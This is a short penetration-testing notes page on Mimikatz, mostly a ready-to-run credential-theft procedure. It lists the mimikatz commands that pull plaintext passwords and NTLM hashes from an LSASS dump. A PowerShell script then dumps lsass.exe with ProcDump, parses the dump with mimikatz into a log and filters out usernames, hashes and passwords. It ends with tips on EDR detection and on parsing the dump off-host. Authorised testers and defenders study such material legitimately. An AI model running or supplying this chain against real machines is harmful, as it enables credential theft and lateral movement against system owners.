Internal Infrastructure Pentest - Mimikatz


Mimikatz: a tool gentilkiwi (Benjamin Delpy) wrote to learn C and experiment with Windows security. It is now well known for extracting plaintext passwords, hashes, PIN codes and Kerberos tickets from memory; it can also perform pass-the-hash and pass-the-ticket, and build Golden Tickets.

Download: https://github.com/gentilkiwi/mimikatz/releases

Commands to run against an LSASS dump file (minidump):

  • mimikatz # privilege::debug
  • mimikatz # sekurlsa::minidump lsass.dmp
  • mimikatz # sekurlsa::logonPasswords

Notes: privilege::debug (SeDebugPrivilege) is only needed when reading a live LSASS process; it is harmless but unnecessary when parsing a dump. Parse the dump on a host running the same Windows version and architecture as the machine it was taken from, otherwise mimikatz may fail to locate the credential structures in the minidump.
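The same procedure end to end, as an added example that is not part of the original notes and not mimikatz's own documentation: create the LSASS dump with Sysinternals ProcDump, then run the mimikatz commands above non-interactively (each quoted argument is one console command) and triage the log. It assumes procdump.exe and mimikatz.exe sit in the current directory and that you run as a local administrator on the source host; the file names are arbitrary.

```powershell
# Added example (not from the original page). Assumes procdump.exe and
# mimikatz.exe are in the current directory (hypothetical layout) and that
# the shell runs elevated on the host whose LSASS is being dumped.

# 1. Full memory dump of lsass.exe. -ma writes a full dump; without it the
#    dump does not contain the memory mimikatz needs. Requires admin rights.
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp

# 2. Parse the dump. privilege::debug is omitted on purpose: it is only
#    required for a live LSASS, not for a minidump. "log" tees all output
#    to a file so the credentials survive the session. Parse on a host with
#    the same Windows version/architecture as the source for reliable results.
.\mimikatz.exe "log lsass-creds.txt" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"

# 3. Quick triage: mimikatz prints each credential as "* Field : value"
#    lines; pull out the ones worth reading first.
Select-String -Path .\lsass-creds.txt -Pattern '^\s*\*\s+(Username|Domain|NTLM|Password)\s*:' |
    ForEach-Object { $_.Line.Trim() }

# 4. Clean up the artifacts once the findings are recorded; a dump of LSASS
#    left on disk is itself a finding.
Remove-Item .\lsass.dmp, .\lsass-creds.txt -Force
```

Expect EDR or Defender to flag both the dump and mimikatz.exe on a hardened host; if the engagement allows, copy the dump off and parse it on a test box with a matching Windows build instead of running mimikatz on the target.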

Blogs:

  • https://adsecurity.org/?page_id=1821
  • https://www.sans.org/reading-room/whitepapers/detection/mimikatz-overview-defenses-detection-36780
  • https://www.offensive-security.com/metasploit-unleashed/mimikatz/
  • http://blog.gentilkiwi.com/mimikatz